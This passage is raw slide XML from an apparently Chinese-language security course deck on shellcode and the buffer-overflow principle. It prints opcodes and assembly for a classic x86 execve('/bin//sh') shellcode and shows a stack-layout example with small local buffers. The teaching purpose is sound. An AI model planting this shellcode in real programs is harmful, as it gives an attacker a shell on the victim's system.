      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="271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989138"/>
            <a:ext cx="7559675" cy="25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a:xfrm>
            <a:off x="566576" y="5280025"/>
            <a:ext cx="8010847" cy="968375"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16506"/>
              <a:gd name="adj2" fmla="val -6610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lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>直接植入缓冲区，被触发执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>代码不能执行，需编译</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29464255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a:xfrm>
            <a:off x="6705600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D37D99-7B6C-4F6E-B183-6B4FA52F2333}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>241</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>汇编版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2857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1989138"/>
            <a:ext cx="4103688"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463" y="1989138"/>
            <a:ext cx="4248150" cy="338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02" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="5516563"/>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shellcode_asm.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285703" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5688013" y="5589588"/>
            <a:ext cx="2192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shellcode_asm_fix.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>去除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>\0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244440304"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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2916D3F-5A34-43DD-8FAD-E8F1660E96C9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>242</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287746" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="765175"/>
            <a:ext cx="7855024" cy="971550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode Opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（反汇编）版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1981200"/>
            <a:ext cx="7543800" cy="3032125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>31 d2		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>52			push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>68 6e 2f 73 68	push   $0x68732f6e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>68 2f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>2f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> 62 69	push   $0x69622f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>89 e3		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>52			push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>53			push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>89 e1		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8d 42 0b		lea    0xb(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>cd 80		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    $0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287750" name="Picture 6"/>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116013" y="4900613"/>
            <a:ext cx="7127875" cy="1624012"/>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9420678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5067588" y="6047606"/>
            <a:ext cx="510911" cy="450056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>243</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36512"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dk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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>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dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>void fun(int);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int main(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    …… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    fun(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>void  fun(int para) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    char buffer_a[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    char buffer_b[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" fontAlgn="auto">
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="246692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buffer_a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="297175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EBP(main)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443" y="347498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返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5074443"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18" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7007919" y="5045114"/>
            <a:ext cx="1308497"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EBP(m)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5074443" y="1628800"/>
            <a:ext cx="1588" cy="4439666"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6874643" y="1628800"/>
            <a:ext cx="0" cy="4439666"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076031"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24" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076031"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27" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076031"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29" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760"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dk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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>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dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>堆栈操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
